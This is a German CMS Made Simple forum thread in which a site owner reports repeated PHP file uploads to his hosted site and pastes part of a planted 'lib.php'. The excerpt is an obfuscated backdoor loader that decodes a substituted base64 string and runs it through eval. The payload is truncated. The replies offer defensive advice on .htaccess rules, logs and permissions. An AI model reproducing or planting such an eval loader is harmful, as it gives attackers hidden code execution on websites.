1blu --> Angriff über CMS Made Simple

FCOe · 01. Oktober 2015 12:59

Ich habe keine Root-Rechte!

Die ersten zwei angeführten Dateien sind in meinem letzten Backup nicht enthalten!
Die "lib.php" sieht komisch aus........

Ausschnitt:

Hier klicken, um den Code zum Kopieren zu markieren

<?php
function qmmd($nns, $ngapjkwe){$jh = ''; for($i=0; $i < strlen($nns); $i++){$jh .= isset($ngapjkwe[$nns[$i]]) ? $ngapjkwe[$nns[$i]] : $nns[$i];}
$li="base64_decode";return $li($jh);}
$xoedl = dIOL5GSb1edTHaGYc8SYeaNM1YcCKvZGjvtVUtVu5zZVesXO7R6qhISqeaGYc8SYcYcCKguVUtV'.
'u5zZVesXO7R6qhzA2eaG21zXD7IOMhOSw5zDOHYt6FRPJRP4b1ero7IOW1GSC5zDV7R6ty'.
'jCyR8O8yIObcaGwyRroBwGlGPGlylPyitTHHASjrGHzrGHhHD4KBASjrBNIHDw6Elu30YKJK'.
'uTHHASjrGHzrGHhHDHAjBSBrGS4rvrlHDw6Elu3FjKs0puLFR2NKpCyRzO8yRAOhe4wil6PeDXABO1ABOCqlArBBASxew1EBO'.
'p5R6Pew1HjvGjKIAbKRrn1eP6Ej26HI1VhIBVR6OJR6PH5zxTKeXwcq4McY6P18OC1GCqh8AW1l770Ru308Vt1YKVydTHReCyR'.
'dPHHI1VhIGLxzDOKgw6xzNw1eHohzApc8SbyRr85zNOzY7LxzDOHDwVUtTHRdPP18OC1zZ9hzB6El4L7zDoh'.
'zApc8SbyRr85zNOh8AW......................................

usw.usw..........

$uf = Array('1'=>'Z', '0'=>'L', '3'=>'i', '2'=>'4', '5'=>'a', '4'=>'B', '7'=>'d', '6'=>'g', '9'=>'h', '8'=>'m', 'A'=>'F', 'C'=>'s', 'B'=>'U', 'E'=>'P', 'D'=>'1', 'G'=>'V', 'F'=>'M', 'I'=>'G', 'H'=>'J', 'K'=>'I', 'J'=>'7', 'M'=>'v', 'L'=>'u', 'O'=>'l', 'N'=>'x', 'Q'=>'H', 'P'=>'k', 'S'=>'9', 'R'=>'C', 'U'=>'O', 'T'=>'o', 'W'=>'t', 'V'=>'p', 'Y'=>'y', 'X'=>'N', 'Z'=>'5', 'a'=>'2', 'c'=>'c', 'b'=>'z', 'e'=>'X', 'd'=>'Q', 'g'=>'D', 'f'=>'q', 'i'=>'e', 'h'=>'b', 'k'=>'6', 'j'=>'T', 'm'=>'8', 'l'=>'S', 'o'=>'f', 'n'=>'r', 'q'=>'n', 'p'=>'j', 's'=>'3', 'r'=>'R', 'u'=>'A', 't'=>'w', 'w'=>'0', 'v'=>'E', 'y'=>'K', 'x'=>'Y', 'z'=>'W');
eval(qmmd($xoedl, $uf));?>

NaN · 01. Oktober 2015 13:01

Wenn ich mir die Verzeichnisse anschaue, dann sind das alles Verzeichnisse in denen man keinen direkten Zugriff auf php-Dateien haben muss. Ergo: .htaccess-Datei anlegen und den direkten Zugriff auf php-Dateien sperren. Werde demnächst meine Beispiel-htaccess-Datei in meiner Signatur entsprechend anpassen. Dazu muss ich aber erstmal genau prüfen, auf welche Dateien man im Backend Zugriff haben muss.

FCOe · 01. Oktober 2015 13:41

@cyberman: nein, es läuft nur CMS Made Simple!

faglork · 01. Oktober 2015 19:01

Du siehst doch, wann die Dateien erzeugt wurden.

Schau halt mal in dein access_log, anhand von Datum und Uhrzeit kannst du doch sehen wer da was getrieben hat.

Servus,
Alex

FCOe · 06. Oktober 2015 07:06

Weiter zum Thema des permanenten Angriffs.
Es scheint in der Tat, ein Angriff über "root"-Rechte zu sein. Jemand sperrt kurzzeitig (ca. 1h) den Zugriff via FTP und spielt die oben teilweise gelistete Datei in einem beliebigen Verzeichnis und wechselnden Namen auf. Wenn diese gelöscht ist, sieht man in der Log-Datei den permanenten Versuch auf diese zuzugreifen, mit nun entsprechenden Fehlercode 404.
Ist die Datei noch nicht gelöscht, sieht man den Statuscode 200 aber auch gelegentlich 500!
Der Zugriff erfolgt über wechselnde IP's.
Wir haben nun nochmals den Support aufgefordert, nach Lücken im "Root"-Bereich zu suchen!
Man ist auf Antwort gespannt!

NaN · 06. Oktober 2015 07:25

Unabhängig davon, was passiert, wenn Du eine .htaccess-Datei in diesen Verzeichnissen anlegst und den Zugriff auf PHP-Dateien sperrst?
Dann dürfte doch in den Access-Logs immer der Statuscode 403 auftauchen.
Das schließt zwar die Lücke nicht, verhindert aber, dass der Code, der da hochgeladen wird, ausgeführt werden kann.

nockenfell · 06. Oktober 2015 08:12

Die .htaccess Datei wäre ein zusätzlicher Indikator wie der Zugriff erfolgt. Wenn die .htaccess Datei (ideal mit CHMOD 444) verändert wurde, ist der Angriff eher per Root-Rechte erfolgt denn per PHP Script.

Schliesse in der .htaccess die Ausführung aller PHP Dateien ausser der index.php aus. Damit dürfte sich einiges absichern lassen. Die Vorlage von NaN bringt hier bereits alle Voraussetzungen mit.

NaN · 06. Oktober 2015 09:08

Schliesse in der .htaccess die Ausführung aller PHP Dateien ausser der index.php aus.

Nee, denn wenn der Angreifer clever ist, nennt er sein Script einfach index.php und dann ist die Türe wieder offen wink
In den Verzeichnissen, die FCOe genannt hat, braucht man keinen Zugriff auf php-Dateien. Da haben php-Dateien mitunter auch überhaupt nichts zu suchen. Auch keine index.php.

Andynium · 06. Oktober 2015 09:27

FCOe schrieb:

Jemand sperrt kurzzeitig (ca. 1h) den Zugriff via FTP

Da scheint aber jemand sehr konkrete Systemkenntnisse zu haben hmm ... und wenn er dazu in der Lage ist, dann hat er den Server gehackt und nicht nur deinen Host.

Du könntest mal schauen, welche Domains noch auf dem Host deines Servers laufen (http://www.ipneighbour.com/) und dann bei den Nachbarn versuchen, auf ähnliche Dateien zuzugreifen. Das Angriffsmuster kennst du ja ...

FCOe · 07. Oktober 2015 09:04

Nachdem ich nochmals alles gecheckt habe und noch eine Änderung in der .htaccess durchgeführt habe (Dank an Alle für die Tipps!) ist nun folgender aktueller Stand!
Nach Löschung der entsprechenden Dateien und Nachricht an den Support hörten die Angriffe nach ca. 1,5 h schlagartig auf! Da hat wohl jemand das Loch bei 1blu gestopft!
Nun warte ich mal auf eine Antwort vom Support!

Forum für CMS/made simple

#26 01. Oktober 2015 12:59

Re: 1blu --> Angriff über CMS Made Simple

#27 01. Oktober 2015 13:01

Re: 1blu --> Angriff über CMS Made Simple

#28 01. Oktober 2015 13:41

Re: 1blu --> Angriff über CMS Made Simple

#29 01. Oktober 2015 19:01

Re: 1blu --> Angriff über CMS Made Simple

#30 06. Oktober 2015 07:06

Re: 1blu --> Angriff über CMS Made Simple

#31 06. Oktober 2015 07:25

Re: 1blu --> Angriff über CMS Made Simple

#32 06. Oktober 2015 08:12

Re: 1blu --> Angriff über CMS Made Simple

#33 06. Oktober 2015 09:08

Re: 1blu --> Angriff über CMS Made Simple

#34 06. Oktober 2015 09:27

Re: 1blu --> Angriff über CMS Made Simple

#35 07. Oktober 2015 09:04

Re: 1blu --> Angriff über CMS Made Simple

Fußzeile des Forums